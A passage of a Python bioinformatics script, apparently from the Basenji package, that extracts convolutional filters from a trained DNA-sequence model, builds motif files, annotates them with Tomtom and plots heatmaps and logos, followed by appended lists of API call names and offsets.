) else: params_file = args[0] model_file = args[1] data_file = args[2] if not os.path.isdir(options.out_dir): os.mkdir(options.out_dir) ################################################################# # load data data_open = h5py.File(data_file) test_seqs1 = data_open['test_in'] test_targets = data_open['test_out'] try: target_names = list(data_open['target_labels']) except KeyError: target_names = ['t%d' % ti for ti in range(test_targets.shape[1])] if options.sample is not None: # choose sampled indexes sample_i = sorted(random.sample(range(test_seqs1.shape[0]), options.sample)) # filter test_seqs1 = test_seqs1[sample_i] test_targets = test_targets[sample_i] # convert to letters test_seqs = basenji.dna_io.hot1_dna(test_seqs1) ################################################################# # model parameters and placeholders job = basenji.dna_io.read_job_params(params_file) job['seq_length'] = test_seqs1.shape[1] job['seq_depth'] = test_seqs1.shape[2] job['num_targets'] = test_targets.shape[2] job['target_pool'] = int(np.array(data_open.get('pool_width', 1))) t0 = time.time() dr = basenji.seqnn.SeqNN() dr.build(job) print('Model building time %ds' % (time.time() - t0)) # adjust for fourier job['fourier'] = 'train_out_imag' in data_open if job['fourier']: test_targets_imag = data_open['test_out_imag'] if options.valid: test_targets_imag = data_open['valid_out_imag'] ################################################################# # predict # initialize batcher if job['fourier']: batcher_test = basenji.batcher.BatcherF( test_seqs1, test_targets, test_targets_imag, batch_size=dr.batch_size, pool_width=job['target_pool']) else: batcher_test = basenji.batcher.Batcher( test_seqs1, test_targets, batch_size=dr.batch_size, pool_width=job['target_pool']) # initialize saver saver = tf.train.Saver() with tf.Session() as sess: # load variables into session saver.restore(sess, model_file) # get weights filter_weights = sess.run(dr.filter_weights[0]) filter_weights = np.transpose(np.squeeze(filter_weights), [2, 1, 0]) print(filter_weights.shape) # test t0 = time.time() layer_filter_outs, _ = dr.hidden(sess, batcher_test, layers=[0]) filter_outs = layer_filter_outs[0] print(filter_outs.shape) # store useful variables num_filters = filter_weights.shape[0] filter_size = filter_weights.shape[2] ################################################################# # individual filter plots ################################################################# # also save information contents filters_ic = [] meme_out = meme_intro('%s/filters_meme.txt' % options.out_dir, test_seqs) for f in range(num_filters): print('Filter %d' % f) # plot filter parameters as a heatmap plot_filter_heat(filter_weights[f, :, :], '%s/filter%d_heat.pdf' % (options.out_dir, f)) # write possum motif file filter_possum(filter_weights[f, :, :], 'filter%d' % f, '%s/filter%d_possum.txt' % (options.out_dir, f), options.trim_filters) # plot weblogo of high scoring outputs plot_filter_logo( filter_outs[:, :, f], filter_size, test_seqs, '%s/filter%d_logo' % (options.out_dir, f), maxpct_t=options.act_t) # make a PWM for the filter filter_pwm, nsites = make_filter_pwm('%s/filter%d_logo.fa' % (options.out_dir, f)) if nsites < 10: # no information filters_ic.append(0) else: # compute and save information content filters_ic.append(info_content(filter_pwm)) # add to the meme motif file meme_add(meme_out, f, filter_pwm, nsites, options.trim_filters) meme_out.close() ################################################################# # annotate filters 
################################################################# # run tomtom subprocess.call( 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' % (options.out_dir, options.out_dir, options.meme_db), shell=True) # read in annotations filter_names = name_filters( num_filters, '%s/tomtom/tomtom.txt' % options.out_dir, options.meme_db) ################################################################# # print a table of information ################################################################# table_out = open('%s/table.txt' % options.out_dir, 'w') # print header for later panda reading header_cols = ('', 'consensus', 'annotation', 'ic', 'mean', 'std') print('%3s %19s %10s %5s %6s %6s' % header_cols, file=table_out) for f in range(num_filters): # collapse to a consensus motif consensus = filter_motif(filter_weights[f, :, :]) # grab annotation annotation = '.' name_pieces = filter_names[f].split('_') if len(name_pieces) > 1: annotation = name_pieces[1] # plot density of filter output scores fmean, fstd = plot_score_density( np.ravel(filter_outs[:, :, f]), '%s/filter%d_dens.pdf' % (options.out_dir, f)) row_cols = (f, consensus, annotation, filters_ic[f], fmean, fstd) print('%-3d %19s %10s %5.2f %6.4f %6.4f' % row_cols, file=table_out) table_out.close() ################################################################# # global filter plots ################################################################# if options.plot_heats: # plot filter-sequence heatmap plot_filter_seq_heat(filter_outs, '%s/filter_seqs.pdf' % options.out_dir) # plot filter-segment heatmap plot_filter_seg_heat(filter_outs, '%s/filter_segs.pdf' % options.out_dir) plot_filter_seg_heat( filter_outs, '%s/filter_segs_raw.pdf' % options.out_dir, whiten=False) # plot filter-target correlation heatmap plot_target_corr(filter_outs, seq_targets, filter_names, target_names, '%s/filter_target_cors_mean.pdf' % options.out_dir, 'mean') plot_target_corr(filter_outs, seq_targets, filter_names, target_names, '%s/filter_target_cors_max.pdf' % options.out_dir, 'max') def get_motif_proteins(meme_db_file): """ Hash motif_id's to protein names using the MEME DB file """ motif_protein = {} for line in open(meme_db_file): a = line.split() if len(a) > 0 and a[0] == 'MOTIF': if a[2][0] == '(': motif_protein[a[1]] = a[2][1:a[2].find(')')] else: motif_protein[a[1]] = a[2] return motif_protein def info_content(pwm, transpose=False, bg_gc=0.415): """ Compute PWM information content. In the original analysis, I used a bg_gc=0.5. For any future analysis, I ought to switch to the true hg19 value of 0.415. 
""" pseudoc = 1e-9 if transpose: pwm = np.transpose(pwm) bg_pwm = [1 - bg_gc, bg_gc, bg_gc, 1 - bg_gc] ic = 0 for i in range(pwm.shape[0]): for j in range(4): # ic += 0.5 + pwm[i][j]*np.log2(pseudoc+pwm[i][j]) ic += -bg_pwm[j] * np.log2( bg_pwm[j]) + pwm[i][j] * np.log2(pseudoc + pwm[i][j]) return ic def make_filter_pwm(filter_fasta): """ Make a PWM for this filter from its top hits """ nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3} pwm_counts = [] nsites = 4 # pseudocounts for line in open(filter_fasta): if line[0] != '>': seq = line.rstrip() nsites += 1 if len(pwm_counts) == 0: # initialize with the length for i in range(len(seq)): pwm_counts.append(np.array([1.0] * 4)) # count for i in range(len(seq)): try: pwm_counts[i][nts[seq[i]]] += 1 except KeyError: pwm_counts[i] += np.array([0.25] * 4) # normalize pwm_freqs = [] for i in range(len(pwm_counts)): pwm_freqs.append([pwm_counts[i][j] / float(nsites) for j in range(4)]) return np.array(pwm_freqs), nsites - 4 def meme_add(meme_out, f, filter_pwm, nsites, trim_filters=False): """ Print a filter to the growing MEME file Attrs: meme_out : open file f (int) : filter index # filter_pwm (array) : filter PWM array nsites (int) : number of filter sites """ if not trim_filters: ic_start = 0 ic_end = filter_pwm.shape[0] - 1 else: ic_t = 0.2 # trim PWM of uninformative prefix ic_start = 0 while ic_start < filter_pwm.shape[0] and info_content( filter_pwm[ic_start:ic_start + 1]) < ic_t: ic_start += 1 # trim PWM of uninformative suffix ic_end = filter_pwm.shape[0] - 1 while ic_end >= 0 and info_content(filter_pwm[ic_end:ic_end + 1]) < ic_t: ic_end -= 1 if ic_start < ic_end: print('MOTIF filter%d' % f, file=meme_out) print( 'letter-probability matrix: alength= 4 w= %d nsites= %d' % (ic_end - ic_start + 1, nsites), file=meme_out) for i in range(ic_start, ic_end + 1): print('%.4f %.4f %.4f %.4f' % tuple(filter_pwm[i]), file=meme_out) print('', file=meme_out) def meme_intro(meme_file, seqs): """ Open MEME motif format file and print intro Attrs: meme_file (str) : filename seqs [str] : list of strings for obtaining background freqs Returns: mem_out : open MEME file """ nts = {'A': 0, 'C': 1, 'G': 2, 'T': 3} # count nt_counts = [1] * 4 for i in range(len(seqs)): for nt in seqs[i]: try: nt_counts[nts[nt]] += 1 except KeyError: pass # normalize nt_sum = float(sum(nt_counts)) nt_freqs = [nt_counts[i] / nt_sum for i in range(4)] # open file for writing meme_out = open(meme_file, 'w') # print intro material print('MEME version 4', file=meme_out) print('', file=meme_out) print('ALPHABET= ACGT', file=meme_out) print('', file=meme_out) print('Background letter frequencies:', file=meme_out) print('A %.4f C %.4f G %.4f T %.4f' % tuple(nt_freqs), file=meme_out) print('', file=meme_out) return meme_out def name_filters(num_filters, tomtom_file, meme_db_file): """ Name the filters using Tomtom matches. Attrs: num_filters (int) : total number of filters tomtom_file (str) : filename of Tomtom output table. 
meme_db_file (str) : filename of MEME db Returns: filter_names [str] : """ # name by number filter_names = ['f%d' % fi for fi in range(num_filters)] # name by protein if tomtom_file is not None and meme_db_file is not None: motif_protein = get_motif_proteins(meme_db_file) # hash motifs and q-value's by filter filter_motifs = {} tt_in = open(tomtom_file) tt_in.readline() for line in tt_in: a = line.split() fi = int(a[0][6:]) motif_id = a[1] qval = float(a[5]) filter_motifs.setdefault(fi, []).append((qval, motif_id)) tt_in.close() # assign filter's best match for fi in filter_motifs: top_motif = sorted(filter_motifs[fi])[0][1] filter_names[fi] += '_%s' % motif_protein[top_motif] return np.array(filter_names) ################################################################################ # plot_target_corr # # Plot a clustered heatmap of correlations between filter activations and # targets. # # Input # filter_outs: # filter_names: # target_names: # out_pdf: ################################################################################ def plot_target_corr(filter_outs, seq_targets, filter_names, target_names, out_pdf, seq_op='mean'): num_seqs = filter_outs.shape[0] num_targets = len(target_names) if seq_op == 'mean': filter_outs_seq = filter_outs.mean(axis=2) else: filter_outs_seq = filter_outs.max(axis=2) # std is sequence by filter. filter_seqs_std = filter_outs_seq.std(axis=0) filter_outs_seq = filter_outs_seq[:, filter_seqs_std > 0] filter_names_live = filter_names[filter_seqs_std > 0] filter_target_cors = np.zeros((len(filter_names_live), num_targets)) for fi in range(len(filter_names_live)): for ti in range(num_targets): cor, p = spearmanr(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti]) filter_target_cors[fi, ti] = cor cor_df = pd.DataFrame( filter_target_cors, index=filter_names_live, columns=target_names) sns.set(font_scale=0.3) plt.figure() sns.clustermap(cor_df, cmap='BrBG', center=0, figsize=(8, 10)) plt.savefig(out_pdf) plt.close() ################################################################################ # plot_filter_seq_heat # # Plot a clustered heatmap of filter activations in # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_seq_heat(filter_outs, out_pdf, whiten=True, drop_dead=True): # compute filter output means per sequence filter_seqs = filter_outs.mean(axis=2) # whiten if whiten: filter_seqs = preprocessing.scale(filter_seqs) # transpose filter_seqs = np.transpose(filter_seqs) if drop_dead: filter_stds = filter_seqs.std(axis=1) filter_seqs = filter_seqs[filter_stds > 0] # downsample sequences seqs_i = np.random.randint(0, filter_seqs.shape[1], 500) hmin = np.percentile(filter_seqs[:, seqs_i], 0.1) hmax = np.percentile(filter_seqs[:, seqs_i], 99.9) sns.set(font_scale=0.3) plt.figure() sns.clustermap( filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax) plt.savefig(out_pdf) #out_png = out_pdf[:-2] + 'ng' #plt.savefig(out_png, dpi=300) plt.close() ################################################################################ # plot_filter_seq_heat # # Plot a clustered heatmap of filter activations in sequence segments. # # Mean doesn't work well for the smaller segments for some reason, but taking # the max looks OK. Still, similar motifs don't cluster quite as well as you # might expect. 
# # Input # filter_outs ################################################################################ def plot_filter_seg_heat(filter_outs, out_pdf, whiten=True, drop_dead=True): b = filter_outs.shape[0] f = filter_outs.shape[1] l = filter_outs.shape[2] s = 5 while l / float(s) - (l / s) > 0: s += 1 print('%d segments of length %d' % (s, l / s)) # split into multiple segments filter_outs_seg = np.reshape(filter_outs, (b, f, s, l / s)) # mean across the segments filter_outs_mean = filter_outs_seg.max(axis=3) # break each segment into a new instance filter_seqs = np.reshape(np.swapaxes(filter_outs_mean, 2, 1), (s * b, f)) # whiten if whiten: filter_seqs = preprocessing.scale(filter_seqs) # transpose filter_seqs = np.transpose(filter_seqs) if drop_dead: filter_stds = filter_seqs.std(axis=1) filter_seqs = filter_seqs[filter_stds > 0] # downsample sequences seqs_i = np.random.randint(0, filter_seqs.shape[1], 500) hmin = np.percentile(filter_seqs[:, seqs_i], 0.1) hmax = np.percentile(filter_seqs[:, seqs_i], 99.9) sns.set(font_scale=0.3) if whiten: dist = 'euclidean' else: dist = 'cosine' plt.figure() sns.clustermap( filter_seqs[:, seqs_i], metric=dist, row_cluster=True, col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax) plt.savefig(out_pdf) #out_png = out_pdf[:-2] + 'ng' #plt.savefig(out_png, dpi=300) plt.close() ################################################################################ # filter_motif # # Collapse the filter parameter matrix to a single DNA motif. # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def filter_motif(param_matrix): nts = 'ACGT' motif_list = [] for v in range(param_matrix.shape[1]): max_n = 0 for n in range(1, 4): if param_matrix[n, v] > param_matrix[max_n, v]: max_n = n if param_matrix[max_n, v] > 0: motif_list.append(nts[max_n]) else: motif_list.append('N') return ''.join(motif_list) ################################################################################ # filter_possum # # Write a Possum-style motif # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def filter_possum(param_matrix, motif_id, possum_file, trim_filters=False, mult=200): # possible trim trim_start = 0 trim_end = param_matrix.shape[1] - 1 trim_t = 0.3 if trim_filters: # trim PWM of uninformative prefix while trim_start < param_matrix.shape[1] and np.max( param_matrix[:, trim_start]) - np.min( param_matrix[:, trim_start]) < trim_t: trim_start += 1 # trim PWM of uninformative suffix while trim_end >= 0 and np.max(param_matrix[:, trim_end]) - np.min( param_matrix[:, trim_end]) < trim_t: trim_end -= 1 if trim_start < trim_end: possum_out = open(possum_file, 'w') print('BEGIN GROUP', file=possum_out) print('BEGIN FLOAT', file=possum_out) print('ID %s' % motif_id, file=possum_out) print('AP DNA', file=possum_out) print('LE %d' % (trim_end + 1 - trim_start), file=possum_out) for ci in range(trim_start, trim_end + 1): print( 'MA %s' % ' '.join(['%.2f' % (mult * n) for n in param_matrix[:, ci]]), file=possum_out) print('END', file=possum_out) print('END', file=possum_out) possum_out.close() ################################################################################ # plot_filter_heat # # Plot a heatmap of the filter's parameters. 
# # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_heat(param_matrix, out_pdf): param_range = abs(param_matrix).max() sns.set(font_scale=2) plt.figure(figsize=(param_matrix.shape[1], 4)) sns.heatmap( param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range, vmax=param_range) ax = plt.gca() ax.set_xticklabels(range(1, param_matrix.shape[1] + 1)) ax.set_yticklabels('TGCA', rotation='horizontal') # , size=10) plt.savefig(out_pdf) plt.close() ################################################################################ # plot_filter_logo # # Plot a weblogo of the filter's occurrences # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_filter_logo(filter_outs, filter_size, seqs, out_prefix, raw_t=0, maxpct_t=None): if maxpct_t: all_outs = np.ravel(filter_outs) all_outs_mean = all_outs.mean() all_outs_norm = all_outs - all_outs_mean raw_t = maxpct_t * all_outs_norm.max() + all_outs_mean left_pad = (filter_size - 1) // 2 right_pad = filter_size - left_pad # print fasta file of positive outputs filter_fasta_out = open('%s.fa' % out_prefix, 'w') filter_count = 0 for i in range(filter_outs.shape[0]): for j in range(filter_outs.shape[1]): if filter_outs[i, j] > raw_t: # construct kmer kmer = '' # determine boundaries, considering padding fstart = j - left_pad fend = fstart + filter_size # if it starts in left_pad if fstart < 0: kmer += 'N' * (-fstart) fstart = 0 # add primary sequence kmer += seqs[i][fstart:fend] # if it ends in right_pad if fend > len(seqs[i]): kmer += 'N' * (fend - len(seqs[i])) # output print('>%d_%d' % (i, j), file=filter_fasta_out) print(kmer, file=filter_fasta_out) filter_count += 1 filter_fasta_out.close() # make weblogo if filter_count > 0: weblogo_cmd = 'weblogo %s < %s.fa > %s.eps' % (weblogo_opts, out_prefix, out_prefix) subprocess.call(weblogo_cmd, shell=True) ################################################################################ # plot_score_density # # Plot the score density and print to the stats table. # # Input # param_matrix: np.array of the filter's parameter matrix # out_pdf: ################################################################################ def plot_score_density(f_scores, out_pdf): sns.set(font_scale=1.3) plt.figure() sns.distplot(f_scores, kde=False) plt.xlabel('ReLU output') plt.savefig(out_pdf) plt.close() return f_scores.mean(), f_scores.std() ################################################################################ # __main__ ################################################################################ if __name__ == '__main__': main() # pdb.runcall(main)
[ "basenji.seqnn.SeqNN", "numpy.array", "basenji.dna_io.read_job_params", "basenji.batcher.BatcherF", "seaborn.set", "numpy.reshape", "seaborn.distplot", "matplotlib.pyplot.xlabel", "basenji.batcher.Batcher", "tensorflow.Session", "numpy.max", "matplotlib.pyplot.close", "os.path.isdir", "basenji.dna_io.hot1_dna", "subprocess.call", "os.mkdir", "numpy.min", "pandas.DataFrame", "scipy.stats.spearmanr", "matplotlib.pyplot.savefig", "matplotlib.use", "seaborn.clustermap", "matplotlib.pyplot.gca", "seaborn.heatmap", "h5py.File", "numpy.squeeze", "numpy.log2", "numpy.transpose", "time.time", "sklearn.preprocessing.scale", "tensorflow.train.Saver", "optparse.OptionParser", "numpy.swapaxes", "matplotlib.pyplot.figure", "numpy.random.randint", "numpy.ravel", "numpy.percentile" ]
[((829, 850), 'matplotlib.use', 'matplotlib.use', (['"""PDF"""'], {}), "('PDF')\n", (843, 850), False, 'import matplotlib\n'), ((1670, 1689), 'optparse.OptionParser', 'OptionParser', (['usage'], {}), '(usage)\n', (1682, 1689), False, 'from optparse import OptionParser\n'), ((3270, 3290), 'h5py.File', 'h5py.File', (['data_file'], {}), '(data_file)\n', (3279, 3290), False, 'import h5py\n'), ((3793, 3828), 'basenji.dna_io.hot1_dna', 'basenji.dna_io.hot1_dna', (['test_seqs1'], {}), '(test_seqs1)\n', (3816, 3828), False, 'import basenji\n'), ((3945, 3988), 'basenji.dna_io.read_job_params', 'basenji.dna_io.read_job_params', (['params_file'], {}), '(params_file)\n', (3975, 3988), False, 'import basenji\n'), ((4195, 4206), 'time.time', 'time.time', ([], {}), '()\n', (4204, 4206), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4214, 4235), 'basenji.seqnn.SeqNN', 'basenji.seqnn.SeqNN', ([], {}), '()\n', (4233, 4235), False, 'import basenji\n'), ((5041, 5057), 'tensorflow.train.Saver', 'tf.train.Saver', ([], {}), '()\n', (5055, 5057), True, 'import tensorflow as tf\n'), ((7204, 7367), 'subprocess.call', 'subprocess.call', (["('tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db))"], {'shell': '(True)'}), "(\n 'tomtom -dist pearson -thresh 0.1 -oc %s/tomtom %s/filters_meme.txt %s' %\n (options.out_dir, options.out_dir, options.meme_db), shell=True)\n", (7219, 7367), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((14271, 14293), 'numpy.array', 'np.array', (['filter_names'], {}), '(filter_names)\n', (14279, 14293), True, 'import numpy as np\n'), ((15402, 15481), 'pandas.DataFrame', 'pd.DataFrame', (['filter_target_cors'], {'index': 'filter_names_live', 'columns': 'target_names'}), '(filter_target_cors, index=filter_names_live, columns=target_names)\n', (15414, 15481), True, 'import pandas as pd\n'), ((15492, 15515), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (15499, 15515), True, 'import seaborn as sns\n'), ((15518, 15530), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (15528, 15530), True, 'import matplotlib.pyplot as plt\n'), ((15533, 15595), 'seaborn.clustermap', 'sns.clustermap', (['cor_df'], {'cmap': '"""BrBG"""', 'center': '(0)', 'figsize': '(8, 10)'}), "(cor_df, cmap='BrBG', center=0, figsize=(8, 10))\n", (15547, 15595), True, 'import seaborn as sns\n'), ((15598, 15618), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (15609, 15618), True, 'import matplotlib.pyplot as plt\n'), ((15621, 15632), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (15630, 15632), True, 'import matplotlib.pyplot as plt\n'), ((16225, 16250), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (16237, 16250), True, 'import numpy as np\n'), ((16394, 16441), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (16411, 16441), True, 'import numpy as np\n'), ((16452, 16494), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (16465, 16494), True, 'import numpy as np\n'), ((16504, 16547), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (16517, 16547), True, 'import numpy as np\n'), ((16551, 16574), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (16558, 16574), 
True, 'import seaborn as sns\n'), ((16578, 16590), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (16588, 16590), True, 'import matplotlib.pyplot as plt\n'), ((16593, 16726), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], row_cluster=True, col_cluster=True,\n linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (16607, 16726), True, 'import seaborn as sns\n'), ((16768, 16788), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (16779, 16788), True, 'import matplotlib.pyplot as plt\n'), ((16857, 16868), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (16866, 16868), True, 'import matplotlib.pyplot as plt\n'), ((17644, 17685), 'numpy.reshape', 'np.reshape', (['filter_outs', '(b, f, s, l / s)'], {}), '(filter_outs, (b, f, s, l / s))\n', (17654, 17685), True, 'import numpy as np\n'), ((17992, 18017), 'numpy.transpose', 'np.transpose', (['filter_seqs'], {}), '(filter_seqs)\n', (18004, 18017), True, 'import numpy as np\n'), ((18161, 18208), 'numpy.random.randint', 'np.random.randint', (['(0)', 'filter_seqs.shape[1]', '(500)'], {}), '(0, filter_seqs.shape[1], 500)\n', (18178, 18208), True, 'import numpy as np\n'), ((18219, 18261), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(0.1)'], {}), '(filter_seqs[:, seqs_i], 0.1)\n', (18232, 18261), True, 'import numpy as np\n'), ((18271, 18314), 'numpy.percentile', 'np.percentile', (['filter_seqs[:, seqs_i]', '(99.9)'], {}), '(filter_seqs[:, seqs_i], 99.9)\n', (18284, 18314), True, 'import numpy as np\n'), ((18318, 18341), 'seaborn.set', 'sns.set', ([], {'font_scale': '(0.3)'}), '(font_scale=0.3)\n', (18325, 18341), True, 'import seaborn as sns\n'), ((18409, 18421), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (18419, 18421), True, 'import matplotlib.pyplot as plt\n'), ((18424, 18570), 'seaborn.clustermap', 'sns.clustermap', (['filter_seqs[:, seqs_i]'], {'metric': 'dist', 'row_cluster': '(True)', 'col_cluster': '(True)', 'linewidths': '(0)', 'xticklabels': '(False)', 'vmin': 'hmin', 'vmax': 'hmax'}), '(filter_seqs[:, seqs_i], metric=dist, row_cluster=True,\n col_cluster=True, linewidths=0, xticklabels=False, vmin=hmin, vmax=hmax)\n', (18438, 18570), True, 'import seaborn as sns\n'), ((18618, 18638), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (18629, 18638), True, 'import matplotlib.pyplot as plt\n'), ((18707, 18718), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (18716, 18718), True, 'import matplotlib.pyplot as plt\n'), ((21275, 21296), 'seaborn.set', 'sns.set', ([], {'font_scale': '(2)'}), '(font_scale=2)\n', (21282, 21296), True, 'import seaborn as sns\n'), ((21299, 21345), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(param_matrix.shape[1], 4)'}), '(figsize=(param_matrix.shape[1], 4))\n', (21309, 21345), True, 'import matplotlib.pyplot as plt\n'), ((21348, 21443), 'seaborn.heatmap', 'sns.heatmap', (['param_matrix'], {'cmap': '"""PRGn"""', 'linewidths': '(0.2)', 'vmin': '(-param_range)', 'vmax': 'param_range'}), "(param_matrix, cmap='PRGn', linewidths=0.2, vmin=-param_range,\n vmax=param_range)\n", (21359, 21443), True, 'import seaborn as sns\n'), ((21478, 21487), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (21485, 21487), True, 'import matplotlib.pyplot as plt\n'), ((21614, 21634), 'matplotlib.pyplot.savefig', 
'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (21625, 21634), True, 'import matplotlib.pyplot as plt\n'), ((21637, 21648), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (21646, 21648), True, 'import matplotlib.pyplot as plt\n'), ((23772, 23795), 'seaborn.set', 'sns.set', ([], {'font_scale': '(1.3)'}), '(font_scale=1.3)\n', (23779, 23795), True, 'import seaborn as sns\n'), ((23798, 23810), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (23808, 23810), True, 'import matplotlib.pyplot as plt\n'), ((23813, 23846), 'seaborn.distplot', 'sns.distplot', (['f_scores'], {'kde': '(False)'}), '(f_scores, kde=False)\n', (23825, 23846), True, 'import seaborn as sns\n'), ((23849, 23874), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""ReLU output"""'], {}), "('ReLU output')\n", (23859, 23874), True, 'import matplotlib.pyplot as plt\n'), ((23877, 23897), 'matplotlib.pyplot.savefig', 'plt.savefig', (['out_pdf'], {}), '(out_pdf)\n', (23888, 23897), True, 'import matplotlib.pyplot as plt\n'), ((23900, 23911), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (23909, 23911), True, 'import matplotlib.pyplot as plt\n'), ((3110, 3140), 'os.path.isdir', 'os.path.isdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3123, 3140), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((3146, 3171), 'os.mkdir', 'os.mkdir', (['options.out_dir'], {}), '(options.out_dir)\n', (3154, 3171), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((4674, 4804), 'basenji.batcher.BatcherF', 'basenji.batcher.BatcherF', (['test_seqs1', 'test_targets', 'test_targets_imag'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, test_targets_imag,\n batch_size=dr.batch_size, pool_width=job['target_pool'])\n", (4698, 4804), False, 'import basenji\n'), ((4869, 4979), 'basenji.batcher.Batcher', 'basenji.batcher.Batcher', (['test_seqs1', 'test_targets'], {'batch_size': 'dr.batch_size', 'pool_width': "job['target_pool']"}), "(test_seqs1, test_targets, batch_size=dr.batch_size,\n pool_width=job['target_pool'])\n", (4892, 4979), False, 'import basenji\n'), ((5066, 5078), 'tensorflow.Session', 'tf.Session', ([], {}), '()\n', (5076, 5078), True, 'import tensorflow as tf\n'), ((5355, 5366), 'time.time', 'time.time', ([], {}), '()\n', (5364, 5366), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10067, 10084), 'numpy.transpose', 'np.transpose', (['pwm'], {}), '(pwm)\n', (10079, 10084), True, 'import numpy as np\n'), ((11127, 11146), 'numpy.array', 'np.array', (['pwm_freqs'], {}), '(pwm_freqs)\n', (11135, 11146), True, 'import numpy as np\n'), ((16161, 16193), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (16180, 16193), False, 'from sklearn import preprocessing\n'), ((17836, 17871), 'numpy.swapaxes', 'np.swapaxes', (['filter_outs_mean', '(2)', '(1)'], {}), '(filter_outs_mean, 2, 1)\n', (17847, 17871), True, 'import numpy as np\n'), ((17928, 17960), 'sklearn.preprocessing.scale', 'preprocessing.scale', (['filter_seqs'], {}), '(filter_seqs)\n', (17947, 17960), False, 'from sklearn import preprocessing\n'), ((22080, 22101), 'numpy.ravel', 'np.ravel', (['filter_outs'], {}), '(filter_outs)\n', (22088, 22101), True, 'import numpy as np\n'), ((23363, 23403), 'subprocess.call', 'subprocess.call', (['weblogo_cmd'], {'shell': '(True)'}), '(weblogo_cmd, shell=True)\n', (23378, 23403), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((5263, 5289), 
'numpy.squeeze', 'np.squeeze', (['filter_weights'], {}), '(filter_weights)\n', (5273, 5289), True, 'import numpy as np\n'), ((8287, 8317), 'numpy.ravel', 'np.ravel', (['filter_outs[:, :, f]'], {}), '(filter_outs[:, :, f])\n', (8295, 8317), True, 'import numpy as np\n'), ((15289, 15350), 'scipy.stats.spearmanr', 'spearmanr', (['filter_outs_seq[:, fi]', 'seq_targets[:num_seqs, ti]'], {}), '(filter_outs_seq[:, fi], seq_targets[:num_seqs, ti])\n', (15298, 15350), False, 'from scipy.stats import spearmanr\n'), ((4289, 4300), 'time.time', 'time.time', ([], {}), '()\n', (4298, 4300), False, 'import copy, os, pdb, random, shutil, subprocess, time\n'), ((10281, 10299), 'numpy.log2', 'np.log2', (['bg_pwm[j]'], {}), '(bg_pwm[j])\n', (10288, 10299), True, 'import numpy as np\n'), ((10325, 10353), 'numpy.log2', 'np.log2', (['(pseudoc + pwm[i][j])'], {}), '(pseudoc + pwm[i][j])\n', (10332, 10353), True, 'import numpy as np\n'), ((19977, 20012), 'numpy.max', 'np.max', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (19983, 20012), True, 'import numpy as np\n'), ((20024, 20059), 'numpy.min', 'np.min', (['param_matrix[:, trim_start]'], {}), '(param_matrix[:, trim_start])\n', (20030, 20059), True, 'import numpy as np\n'), ((20173, 20206), 'numpy.max', 'np.max', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20179, 20206), True, 'import numpy as np\n'), ((20209, 20242), 'numpy.min', 'np.min', (['param_matrix[:, trim_end]'], {}), '(param_matrix[:, trim_end])\n', (20215, 20242), True, 'import 